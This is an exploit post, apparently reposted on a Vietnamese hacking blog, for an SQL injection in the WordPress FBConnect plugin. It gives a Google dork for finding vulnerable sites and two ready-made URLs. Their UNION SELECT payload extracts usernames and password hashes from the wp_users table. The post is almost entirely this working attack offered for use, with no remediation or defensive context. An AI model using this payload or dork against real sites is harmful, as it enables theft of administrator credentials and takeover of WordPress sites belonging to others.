_WordPress plugin FBConnect SQL Injection Vulnerability

# Exploit Title: WordPress plugin FBConnect SQL-Inj
# Google Dork: inurl:"fbconnect_action=myhome"
# Date: 03.04.2011
# Author: cyber-punk
# Software Link: http://wordpress.org/
# Version: all, if plugin is on
# GreetZ: 1337day.com Exploit DataBase

http://wordpress-site/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass), 7,8,9,10,11,12+from+wp_users--

or

http://wp-site/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass), 7,8,9,10,11,12+from+wp_users--

Chú Ý:

Coppy phải ghi rõ nguồn Blog - Hacking

_WordPress plugin FBConnect SQL Injection Vulnerability

Chú Ý:

Bài đăng phổ biến